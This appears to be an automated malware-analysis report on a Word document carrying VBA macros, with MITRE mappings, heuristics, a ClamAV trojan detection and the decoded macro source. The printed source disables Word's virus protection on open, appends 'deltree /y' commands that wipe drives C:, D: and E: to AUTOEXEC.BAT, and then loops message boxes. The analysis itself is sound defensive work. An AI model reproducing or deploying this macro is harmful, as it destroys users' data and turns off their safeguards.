MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The AutoOpen macro is triggered upon opening, which then executes the WorldWar macro. This macro attempts to delete files from drives C:, D:, and E: by executing 'deltree' commands and then proceeds to chain calls to other macros (NATO, USA, Info, Germany), each displaying a message box. The ClamAV detection on an extracted artifact suggests it's a known trojan. The presence of AutoOpen and VBA macros points to a malicious document, likely delivered via spearphishing.
Heuristics 3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1920 bytes |
SHA-256: 47bbcdf595a6fcd2c029682066eb6b8e3a9fee69cd0fbf3ce865daa78b3fd2e7 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
With Options
.VirusProtection = False
End With
Application.DisplayRecentFiles = False
MsgBox "World War starting now!"
Application.Run MacroName:="WorldWar"
End Sub
Sub WorldWar()
Documents.Open FileName:="AUTOEXEC.BAT", ConfirmConversions:=False, _
ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto
Selection.EndKey Unit:=wdStory
Selection.TypeParagraph
Selection.TypeText Text:="deltree /y e:\ >nul "
Selection.TypeParagraph
Selection.TypeText Text:="deltree /y d:\ >nul "
Selection.TypeParagraph
Selection.TypeText Text:="deltree /y c:\ >nul "
ActiveDocument.Save
ActiveDocument.Close
Application.Run MacroName:="NATO"
End Sub
Sub NATO()
MsgBox "3rd World War"
Application.Run MacroName:="USA"
End Sub
Sub USA()
MsgBox "3rd World War"
Application.Run MacroName:="Info"
End Sub
Sub Info()
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
Msg = "3rd World War"
Style = vbYesOk + vbCritical + vbDefaultButton2
Title = "Tvangeste v 1.0"
Help = "DEMO.HLP"
Ctxt = 1000
Response = MsgBox(Msg, Style, Title, Help, Ctxt)
If Response = vbYes Then
MyString = "Да"
Else
MyString = "Нет"
End If
Application.Run MacroName:="Germany"
End Sub
Sub Germany()
MsgBox "3rd World War"
Application.Run MacroName:="GermanyB"
End Sub
Sub GermanyB()
MsgBox "3rd World War"
Application.Run MacroName:="Germany"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.